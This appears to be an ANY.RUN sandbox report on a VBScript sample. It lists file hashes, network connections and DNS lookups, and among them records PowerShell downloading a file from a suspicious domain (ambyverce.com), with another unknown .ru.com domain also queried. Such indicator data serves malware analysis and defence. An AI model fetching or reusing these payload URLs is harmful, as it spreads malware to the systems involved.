6340powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_u5iooyxr.ukw.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1488powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:8E7D26D71A1CAF822C338431F0651251
SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
6340powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:CF02A17AB792734D31D94427DE24BDF1
SHA256:CE31491188B444972FE900440A7475FC22B7E3EBB36FEF916B7CD75FA1D502A4
1488powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5manmrna.fzl.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
31
DNS requests
22
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5052
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7144
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
6952
SIHClient.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6340
powershell.exe
GET
200
193.25.216.108:80
http://ambyverce.com/Testamentdjr.snp
unknown
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2208
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
1132
RUXIMICS.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2120
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3260
svchost.exe
40.113.103.199:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5052
svchost.exe
20.190.159.4:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5052
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
7144
backgroundTaskHost.exe
20.103.156.88:443
arc.msn.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
7144
backgroundTaskHost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
2120
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 51.104.136.2
  • 51.124.78.146
whitelisted
google.com
  • 142.250.185.110
whitelisted
client.wns.windows.com
  • 40.113.103.199
whitelisted
login.live.com
  • 20.190.159.4
  • 20.190.159.2
  • 20.190.159.75
  • 40.126.31.73
  • 20.190.159.71
  • 40.126.31.71
  • 20.190.159.64
  • 40.126.31.67
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
aterecierais.ru.com
unknown
arc.msn.com
  • 20.103.156.88
whitelisted
ambyverce.com
  • 193.25.216.108
unknown
slscr.update.microsoft.com
  • 13.85.23.86
whitelisted
www.microsoft.com
  • 23.52.120.96
whitelisted

Threats

PID
Process
Class
Message
6340
powershell.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 37
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
SAMPLE ORDER.vbs